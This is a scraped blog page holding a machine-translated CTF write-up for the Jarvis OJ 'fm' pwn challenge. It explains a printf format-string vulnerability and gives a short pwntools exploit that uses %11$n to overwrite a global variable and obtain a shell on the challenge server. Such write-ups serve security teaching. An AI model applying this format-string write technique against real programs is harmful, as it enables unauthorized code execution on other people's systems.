当前位置:网站首页>[61dctf]fm
[61dctf]fm
2022-07-05 16:46:00 【[mzq]】
[61dctf]fm
Attachment address : https://dn.jarvisoj.com/challengefiles/fm.eaef2247796c11db798a579396482399
nc pwn2.jarvisoj.com 9895
checksec Canary found The stack overflows and the travel is blocked
main function
stay if Determine the x Value , however x The value of is beyond our control ,printf Output &buf Value , Here is a format string attack , and if The judgment is 4 and $n Can output 4 Of int Value to any address .
int __cdecl main(int argc, const char **argv, const char **envp)
{
char buf; // [esp+2Ch] [ebp-5Ch]
unsigned int v5; // [esp+7Ch] [ebp-Ch]
v5 = __readgsdword(0x14u);
be_nice_to_people();
memset(&buf, 0, 0x50u);
read(0, &buf, 0x50u);
printf(&buf);
printf("%d!\n", x);
if ( x == 4 )
{
puts("running sh...");
system("/bin/sh");
}
return 0;
}
You can see the output aaaa The offset of 11
Through dynamic debugging , hold x Is set to 0x4, After running, you really get shell
exp
from pwn import *
io = process("./stack")
io = remote("pwn2.jarvisoj.com", 9895)
x_addr = 0x0804A02C
context(log_level="debug", arch="i386")
payload = flat([x_addr,'%11$n'])
io.sendline(payload)
io.interactive()
边栏推荐
- 【漏洞预警】CVE-2022-26134 Confluence 远程代码执行漏洞POC验证与修复过程
- Cartoon: what is MapReduce?
- 数据访问 - EntityFramework集成
- Solve the Hanoi Tower problem [modified version]
- 2020-2022 two-year anniversary of creation
- Record a 'very strange' troubleshooting process of cloud security group rules
- 一些認知的思考
- 搜索 正排索引 和 倒排索引 区别
- JSON转MAP前后数据校验 -- 自定义UDF
- Summary of PHP pseudo protocol of cisp-pte
猜你喜欢
Jarvis OJ Webshell分析
[deep learning] how does deep learning affect operations research?
Accès aux données - intégration du cadre d'entité
【组队 PK 赛】本周任务已开启 | 答题挑战,夯实商品详情知识
Jarvis OJ 远程登录协议
极坐标扇图使用场景与功能详解
Clear restore the scene 31 years ago, volcanic engine ultra clear repair beyond classic concert
Research and development efficiency measurement index composition and efficiency measurement methodology
解决CMakeList find_package找不到Qt5,找不到ECM
深潜Kotlin协程(二十一):Flow 生命周期函数
随机推荐
PHP 严格模式
Quelques réflexions cognitives
Is it safe for Guotai Junan to open an account online
File operation --i/o
Data verification before and after JSON to map -- custom UDF
迁移/home分区
The new version of effect editor is online! 3D rendering, labeling, and animation, this time an editor is enough
Starkware: to build ZK "universe"
Fleet tutorial 09 basic introduction to navigationrail (tutorial includes source code)
Using graylog alarm function to realize the regular work reminder of nail group robots
树莓派4b安装Pytorch1.11
[js] 技巧 简化if 判空
Domestic API management artifact used by the company
用键盘输入一条命令
Do sqlserver have any requirements for database performance when doing CDC
新春限定丨“牛年忘烦”礼包等你来领~
[es6] add if judgment or ternary operator judgment in the template string
Practice independent and controllable 3.0 and truly create the open source business of the Chinese people
ES6 deep - ES6 class class
scratch五彩糖葫芦 电子学会图形化编程scratch等级考试三级真题和答案解析2022年6月